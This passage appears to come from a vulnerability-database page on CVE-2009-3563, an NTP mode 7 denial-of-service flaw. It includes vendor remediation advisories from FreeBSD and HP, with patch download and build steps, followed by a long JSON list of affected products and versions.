    group memberships, which allows local users to gain privileges via
    a sudo command.
    

    Corrected: 2010-01-06 21:45:30 UTC (RELENG_8, 8.0-STABLE) 2010-01-06 21:45:30 UTC (RELENG_8_0, 8.0-RELEASE-p2) 2010-01-06 21:45:30 UTC (RELENG_7, 7.2-STABLE) 2010-01-06 21:45:30 UTC (RELENG_7_2, 7.2-RELEASE-p6) 2010-01-06 21:45:30 UTC (RELENG_7_1, 7.1-RELEASE-p10) 2010-01-06 21:45:30 UTC (RELENG_6, 6.4-STABLE) 2010-01-06 21:45:30 UTC (RELENG_6_4, 6.4-RELEASE-p9) 2010-01-06 21:45:30 UTC (RELENG_6_3, 6.3-RELEASE-p15) CVE Name: CVE-2009-3563

    For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit .

    II.

    III.

    IV. Workaround

    Proper filtering of mode 7 NTP packets by a firewall can limit the number of systems used to attack your resources. Solution

    Perform one of the following:

    1) Upgrade your vulnerable system to 6-STABLE, 7-STABLE or 8-STABLE, or to the RELENG_8_0, RELENG_7_2, RELENG_7_1, RELENG_6_4, or RELENG_6_3 security branch dated after the correction date.

    2) To patch your present system:

    The following patches have been verified to apply to FreeBSD 6.3, 6.4, 7.1, 7.2, and 8.0 systems.

    a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility.

    fetch http://security.FreeBSD.org/patches/SA-10:02/ntpd.patch

    fetch http://security.FreeBSD.org/patches/SA-10:02/ntpd.patch.asc

    b) Execute the following commands as root:

    cd /usr/src

    patch < /path/to/patch

    cd /usr/src/usr.sbin/ntp/ntpd

    make obj && make depend && make && make install

    /etc/rc.d/ntpd restart

    VI. Correction details

    The following list contains the revision numbers of each file that was corrected in FreeBSD.

    CVS:

    Branch Revision Path


    RELENG_6 src/contrib/ntp/ntpd/ntp_request.c 1.1.1.4.8.2 RELENG_6_4 src/UPDATING 1.416.2.40.2.13 src/sys/conf/newvers.sh 1.69.2.18.2.15 src/contrib/ntp/ntpd/ntp_request.c 1.1.1.4.8.1.2.1 RELENG_6_3 src/UPDATING 1.416.2.37.2.20 src/sys/conf/newvers.sh 1.69.2.15.2.19 src/contrib/ntp/ntpd/ntp_request.c 1.1.1.4.20.1 RELENG_7 src/contrib/ntp/ntpd/ntp_request.c 1.1.1.4.18.2 RELENG_7_2 src/UPDATING 1.507.2.23.2.9 src/sys/conf/newvers.sh 1.72.2.11.2.10 src/contrib/ntp/ntpd/ntp_request.c 1.1.1.4.18.1.4.1 RELENG_7_1 src/UPDATING 1.507.2.13.2.13 src/sys/conf/newvers.sh 1.72.2.9.2.14 src/contrib/ntp/ntpd/ntp_request.c 1.1.1.4.18.1.2.1 RELENG_8 src/contrib/ntp/ntpd/ntp_request.c 1.2.2.1 RELENG_8_0 src/UPDATING 1.632.2.7.2.5 src/sys/conf/newvers.sh 1.83.2.6.2.5 src/contrib/ntp/ntpd/ntp_request.c 1.2.4.1


    Subversion:

    Branch/path Revision


    stable/6/ r201679 releng/6.4/ r201679 releng/6.3/ r201679 stable/7/ r201679 releng/7.2/ r201679 releng/7.1/ r201679 stable/8/ r201679 releng/8.0/ r201679 head/ r200576


    VII. The upgrade is available by downloading from software.hp.com -> HPUX 11i Software -> Internet ready and networking -> HP-UX Network Time Protocol version 4 or directly from https://h20392.www2.hp.com/portal/swdepot/displayP roductInfo.do?productNumber=HPUX-NTP Please review the Installation link at the bottom of the page. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.

    Release Date: 2011-03-28 Last Updated: 2011-03-24


    Potential Security Impact: Remote Denial of Service (DoS)

    Source: Hewlett-Packard Company, HP Software Security Response Team

    VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP-UX running XNTP. The vulnerability could be exploited remotely create a Denial of Service (DoS).

    References: CVE-2009-3563

    SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23, B.11.31 running XNTP.

    BACKGROUND

    CVSS 2.0 Base Metrics

    Reference Base Vector Base Score CVE-2009-3563 (AV:N/AC:L/Au:N/C:N/I:P/A:P) 6.4 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

    RESOLUTION

    HP has provided the following patches to resolve this vulnerability. The patches are available by contacting HP Support.

    http://itrc.hp.com

    HP-UX Release / Patch ID

    B.11.11 (11i v1) / PHNE_41907

    B.11.23 (11i v2) / PHNE_41908

    B.11.31 (11i v3) / PHNE_41177

    MANUAL ACTIONS: No

    PRODUCT SPECIFIC INFORMATION

    HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa

    The following text is for use by the HP-UX Software Assistant.

    AFFECTED VERSIONS

    HP-UX B.11.11

    InternetSrvcs.INETSVCS-BOOT action: install patch PHNE_41907 or subsequent

    HP-UX B.11.23

    InternetSrvcs.INETSVCS2-BOOT action: install patch PHNE_41908 or subsequent

    HP-UX B.11.31

    NTP.NTP-RUN action: install patch PHNE_41177 or subsequent

    END AFFECTED VERSIONS

    HISTORY Version:1 (rev.1) 28 March 2011 Initial release

    Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

    Support: For further information, contact normal HP Services support channel.

    Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-alert@hp.com Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches -check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems -verify your operating system selections are checked and save.

    To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.

    To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do

    • The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:

    GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault

    System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

    "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

    Copyright 2009 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners

    Show details on source website

    {
      "affected_products": {
        "_id": null,
        "data": [
          {
            "_id": null,
            "model": "unified communications manager 5.1",
            "scope": null,
            "trust": 2.1,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ntp",
            "scope": "eq",
            "trust": 1.9,
            "vendor": "ntp",
            "version": "4.1.2"
          },
          {
            "_id": null,
            "model": "ntp",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "ntp",
            "version": "4.2.2p2"
          },
          {
            "_id": null,
            "model": "ntp",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "ntp",
            "version": "4.0.91"
          },
          {
            "_id": null,
            "model": "ntp",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "ntp",
            "version": "4.2.2p3"
          },
          {
            "_id": null,
            "model": "ntp",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "ntp",
            "version": "4.0.93"
          },
          {
            "_id": null,
            "model": "ntp",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "ntp",
            "version": "4.2.2p1"
          },
          {
            "_id": null,
            "model": "ntp",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "ntp",
            "version": "4.0.73"
          },
          {
            "_id": null,
            "model": "ntp",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "ntp",
            "version": "4.0.92"
          },
          {
            "_id": null,
            "model": "ntp",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "ntp",
            "version": "4.0.90"
          },
          {
            "_id": null,
            "model": "ntp",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "ntp",
            "version": "4.0.94"
          },
          {
            "_id": null,
            "model": "ntp",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "ntp",
            "version": "4.0.96"
          },
          {
            "_id": null,
            "model": "ntp",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "ntp",
            "version": "4.0.98"
          },
          {
            "_id": null,
            "model": "ntp",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "ntp",
            "version": "4.0.97"
          },
          {
            "_id": null,
            "model": "ntp",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "ntp",
            "version": "4.2.5"
          },
          {
            "_id": null,
            "model": "ntp",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "ntp",
            "version": "4.2.2"
          },
          {
            "_id": null,
            "model": "ntp",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "ntp",
            "version": "4.1.0"
          },
          {
            "_id": null,
            "model": "ntp",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "ntp",
            "version": "4.2.0"
          },
          {
            "_id": null,
            "model": "ntp",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "ntp",
            "version": "4.2.2p4"
          },
          {
            "_id": null,
            "model": "ntp",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "ntp",
            "version": "4.0.99"
          },
          {
            "_id": null,
            "model": "ntp",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "ntp",
            "version": "4.0.72"
          },
          {
            "_id": null,
            "model": "ntp",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "ntp",
            "version": "4.0.95"
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "apple",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "debian gnu linux",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "gentoo linux",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "meinberg funkuhren",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "qnx",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "red hat",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "sun microsystems",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "the sco group",
            "version": null
          },
          {
            "_id": null,
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "ubuntu",
            "version": null
          },
          {
            "_id": null,
            "model": "sparc",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30aa\u30e9\u30af\u30eb",
            "version": null
          },
          {
            "_id": null,
            "model": "sun solaris",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b5\u30f3 \u30de\u30a4\u30af\u30ed\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "_id": null,
            "model": "aix",
            "scope": null,
            "trust": 0.8,
            "vendor": "ibm",
            "version": null
          },
          {
            "_id": null,
            "model": "asianux server",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b5\u30a4\u30d0\u30fc\u30c8\u30e9\u30b9\u30c8\u682a\u5f0f\u4f1a\u793e",
            "version": null
          },
          {
            "_id": null,
            "model": "red hat enterprise linux",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
            "version": null
          },
          {
            "_id": null,
            "model": "securebranch",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u65e5\u672c\u96fb\u6c17",
            "version": null
          },
          {
            "_id": null,
            "model": "ntp",
            "scope": null,
            "trust": 0.8,
            "vendor": "ntp",
            "version": null
          },
          {
            "_id": null,
            "model": "hp tru64 unix",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30d2\u30e5\u30fc\u30ec\u30c3\u30c8 \u30d1\u30c3\u30ab\u30fc\u30c9",
            "version": null
          },
          {
            "_id": null,
            "model": "netshelter\u30b7\u30ea\u30fc\u30ba",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u5bcc\u58eb\u901a",
            "version": null
          },
          {
            "_id": null,
            "model": "ip8800/s,/r",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u65e5\u672c\u96fb\u6c17",
            "version": null
          },
          {
            "_id": null,
            "model": "ipcom\u30b7\u30ea\u30fc\u30ba",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u5bcc\u58eb\u901a",
            "version": null
          },
          {
            "_id": null,
            "model": "netra sparc",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30aa\u30e9\u30af\u30eb",
            "version": null
          },
          {
            "_id": null,
            "model": "red hat enterprise linux desktop",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
            "version": null
          },
          {
            "_id": null,
            "model": "hp-ux",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30d2\u30e5\u30fc\u30ec\u30c3\u30c8 \u30d1\u30c3\u30ab\u30fc\u30c9",
            "version": null
          },
          {
            "_id": null,
            "model": "red hat enterprise linux eus",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30ec\u30c3\u30c9\u30cf\u30c3\u30c8",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b5\u30f3 \u30de\u30a4\u30af\u30ed\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "_id": null,
            "model": "unified communications manager su1",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "unified callmanager 4.3 sr1a",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 131",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "unified meetingplace express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 95",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "linux hppa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "-release-p2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 54",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 93",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "tcp/ip services for openvms alpha",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.4"
          },
          {
            "_id": null,
            "model": "networks enterprise voip tm-cs1000",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "_id": null,
            "model": "proactive contact",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.1.1"
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "big-ip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.3"
          },
          {
            "_id": null,
            "model": "rtos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "qnx",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "big-ip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.0.3"
          },
          {
            "_id": null,
            "model": "ace appliance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "_id": null,
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "meeting exchange sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 121",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "big-ip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4.5"
          },
          {
            "_id": null,
            "model": "big-ip application security manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4.7"
          },
          {
            "_id": null,
            "model": "big-ip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.0.5"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 99",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "cms server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "15.0"
          },
          {
            "_id": null,
            "model": "rtos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "qnx",
            "version": "6.3.2"
          },
          {
            "_id": null,
            "model": "unified callmanager 4.1 sr5",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "netbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "4.0.2"
          },
          {
            "_id": null,
            "model": "messaging storage server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "aix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.3.7"
          },
          {
            "_id": null,
            "model": "aura application enablement services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "4.2.2"
          },
          {
            "_id": null,
            "model": "big-ip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.6.1"
          },
          {
            "_id": null,
            "model": "solaris 8 sparc",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "aix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.3"
          },
          {
            "_id": null,
            "model": "linux lts amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "_id": null,
            "model": "unified callmanager 3.3 sr2a",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "aura system platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 100",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 124",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 123",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "unified communications manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "big-ip build",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.2413.1"
          },
          {
            "_id": null,
            "model": "linux alpha",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 49",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "linux mipsel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "-release-p5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "wide area application services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.17"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 114",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "aura communication manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "2009.1"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "9.1"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 128",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 85",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 19",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "nexus",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "70000"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 107",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "wireless location appliance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 45",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "-prerelease",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "unified communications",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5000"
          },
          {
            "_id": null,
            "model": "wide area application services",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "_id": null,
            "model": "message networking",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "meeting exchange sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "cms server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "14.1"
          },
          {
            "_id": null,
            "model": "vma",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 78",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "voice portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 108",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "rtos",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "qnx",
            "version": "6.4.2"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 28",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "big-ip application security manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4.8"
          },
          {
            "_id": null,
            "model": "linux powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "9.10"
          },
          {
            "_id": null,
            "model": "big-ip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.2"
          },
          {
            "_id": null,
            "model": "unified callmanager sr5c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "big-ip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4.3"
          },
          {
            "_id": null,
            "model": "unified callmanager 3.3 sr2b",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 89",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "6.3-release-p10",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "big-ip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "big-ip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.4.6"
          },
          {
            "_id": null,
            "model": "unified communications manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 39",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "message networking mn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "_id": null,
            "model": "-release-p8",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.3"
          },
          {
            "_id": null,
            "model": "p1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ntp",
            "version": "4.2.2"
          },
          {
            "_id": null,
            "model": "linux lpia",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "9.04"
          },
          {
            "_id": null,
            "model": "cms server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "14.0"
          },
          {
            "_id": null,
            "model": "opensolaris build snv 90",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 68",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "unified communications manager 7.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "linux ia-64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "unified communications manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.3"
          },
          {
            "_id": null,
            "model": "tcp/ip services for openvms alpha",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.5"
          },
          {
            "_id": null,
            "model": "6.3-release-p11",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 67",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 120",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "opensolaris build snv 51",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "_id": null,
            "model": "7.2-rc2",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "big-ip",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "f5",
            "version": "9.6"
          },
          {
            "_id": null,
            "model": "unified communications manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.1(3)"
          },
          {
            "_id": null,
            "model": "unified communications manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.0(1)"
          },
          {
            "_id": null,
            "model": "7.0-release-p12",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "unified callmanager 4.1 sr8a",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "aix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1.1"
          },
          {
            "_id": null,
            "model": "unified callmanager 4.3 sr1",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "aura system platform sp1.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "linux mandrake x86 64",
